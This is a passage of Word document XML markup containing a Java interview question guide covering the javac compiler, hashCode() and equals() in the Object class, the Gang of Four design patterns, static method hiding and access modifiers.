    <w:p w14:paraId="25A3568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F5AD9E" w14:textId="262D0C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E4CD772"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64F228D2"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Class i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3914FC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58" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="166373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05263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independent of the outer class’s instance, wherea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 xml:space="preserve"> requires an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20A338" w14:textId="698BD7F4" w:rsidR="007415DC" w:rsidRPr="00CE4B95"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59" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FBF46B" w14:textId="7360A305" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44E5C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc197867249"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which compiler is used by Java</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="5FB2B97E" w14:textId="392FB2B0" w:rsidR="009361FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009361FD" w:rsidP="00FE0A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uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Compiler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>javac</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You write your Java code in .java files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB6964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ing with javac</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AFB281"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with java</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7EFDE"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CE4B95" w:rsidRDefault="009361FD" w:rsidP="009361F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cess:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784FCD4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Write Java code (e.g., HelloWorld.java).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2883A451"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Compile the Java code using the javac command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F1F4C" w14:textId="5FB17F23"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hello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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4165407E"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duces a HelloWorld.class file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468007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Run the compiled bytecode with the JVM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB3B18" w14:textId="57996EE7"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HelloWorld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B93DC"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ava compiler javac is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Development Kit (JDK)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Pr="00CE4B95"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372AB91" w14:textId="28115EC4" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="00F06DF5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc197867250"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where are the hash</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925"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equals</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s defined in java</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="02A43017" w14:textId="6C8BEF6B" w:rsidR="006C1C15" w:rsidRPr="00CE4B95" w:rsidRDefault="006C1C15" w:rsidP="008044B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hashCode() and equals() methods are defined in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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD58E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6EC26AFC"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s defined in the Object class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F2C20"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1179978A" w14:textId="268214A0"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p>
    <w:p w14:paraId="34EA6614"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1F5AE29C"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quals() method is also defined in the Object class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB4503D"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ever, it is commonly overridden in custom classes to compare the content or state of the objects instead of their references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DF0B09"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78636EF8" w14:textId="49C4ED5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92AC79A"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09384B72"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hashCode() and equals():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F886203"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have different hash codes, they are considered unequal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240FCA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CD20EC0"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341DD6A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BFAAD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09D77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79BD6A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086D07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F8FCA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E00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99EE6D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00AF42A"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5C73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F8B8F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ADD8F5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FBBE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ame object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67ECC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9F344C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4A1EF24"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43600D0C"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E15E7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13A7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75DD00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1CD9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nerate hash code based on fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413822A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5EE2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p>
    <w:p w14:paraId="0FDE42A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B0F85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34B18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8B1BD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5FB745B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14F9818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2EBC76E"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A4E8C3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2652DB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35FD7" w14:textId="6A6BFA2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42499E8"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Pr="00CE4B9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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AE145" w14:textId="60347B1C" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="009629C9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc197867251"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How many design patterns are present in java</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="06F1D5D6" w14:textId="65CA4F30" w:rsidR="00CA2D8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2D8F" w:rsidP="009C4D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support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that are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Gang of Four (GoF) design patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, as described in the book </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Design Patterns: Elements of Reusable Object-Oriented Software"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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reational Patterns (5 patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D20E5E"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se patterns deal with object creation mechanisms, trying to create objects in a manner suitable to the situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DCF97"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Factory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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uctural Patterns (7 patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68973DD1"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ridge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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rator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ade</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a simplified interface to a complex system of classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3384DE58"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yweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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xy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ehavioral Patterns (11 patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBF2CC"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 of Responsibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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r</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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diator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ento</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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mplate Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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tor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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GoF Design Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157AC64F"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al Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 5 patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22168716"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uctural Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 7 patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55492E48"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al Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 11 patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73817172"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Pr="00CE4B95"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A5A4CF" w14:textId="2DB42B60" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="005A4248">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc197867252"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we override the static method</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="6BAFAF6C" w14:textId="661A4B3A" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529" w:rsidP="00855EA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 cannot be overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the traditional sense. However, they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A9EA267"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C91A7D"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Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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9EEAC4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54FF23"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C8A2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Parent class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DDBD7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B0F6B"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044B5FC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532E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9F7056"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is method hiding, not overriding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A55C9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DE2CC2"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Child class"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67B36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AD86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4E2CBAA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01DE0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AF9D5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3000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26959B1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546C5757"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5F7A19"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using Parent reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DBF49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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294300B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 (not the Child class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F982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36FDDD" w14:textId="1F6D4A5E"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0E1BA"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1EF06BFF"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7D0778" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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verriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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CE4B95"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696E96">
          <v:rect id="_x0000_i1163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2913CE" w14:textId="0901C590" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="005121AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc197867253"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain access modifiers in java</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="0639AB27" w14:textId="48CC245F" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="00783F5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ublic (public)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4116AB"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provides the least restrictive level of access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A58AA0"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3CE0C9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05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2B62461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26987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335F1"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01292104"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9E9981" w14:textId="108ECB40"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4E049" w14:textId="2C13847A" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AD1DB2" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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lass MyClass, the variable x, and the method myMethod can be accessed from anywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295912F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ivate (private)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5938D396"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2DDB295"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8B22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6476781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E96AD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3755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07A98B4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84D7BF" w14:textId="41DD8B75"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0C55E47" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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from within the MyClass class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE96B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otected (protected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9E5C5"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otected modifier allows access to the member from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E07BE0"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ame class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFD1AE4"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ubclass (even if it is in a different package).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD607C"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lasses in the same package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B7614"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9370F8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BA3E7"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36ABCA6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80CA6D"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E29EDA"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6AF4D05C"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27B03" w14:textId="55883DF1"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18841B4" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Package-Private)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484B2D7B"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When no access modifier is specified, it is considered the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default access level</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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945844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F0AD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access modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2E7ED6"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4CC4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C4C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0753CF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A9B93" w14:textId="69139663"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9FE4094" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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CE4B95" w14:paraId="2FB30845" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="256C322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Classes (Different Package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w14:paraId="25FEDFF7" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="025113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5C6D56" w:rsidRPr="00CE4B95" w14:paraId="7BAF4EFB" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DE2BDC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1250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6A208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33CF9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045A1206" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F75FACF"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72485DA8" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E721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1220C8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bl>
    <w:p w14:paraId="5D3DDE1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 Access Modifier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E973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Use it when you want to make the member accessible from anywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787ADD0F"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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 Usage of All Access Modifiers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD43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64BF5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ublic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from anywhere</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260C9C6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ivate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is class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA1A8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otected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within the same package and subclasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66387C7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efault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e same package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200BCFC1"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2DCF85"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ublic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7EE1D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36AA6AE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869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D660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vate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F82A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6AC3A9AA"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50C1A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22679C"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otected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D7ED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742826F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6CC826"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69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faul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0E9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31BF17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A7933" w14:textId="26555993"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E9CCCC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6A1ACE" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ta hiding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B39E939" w14:textId="0D2EE54F" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="0004562A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc197867254"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
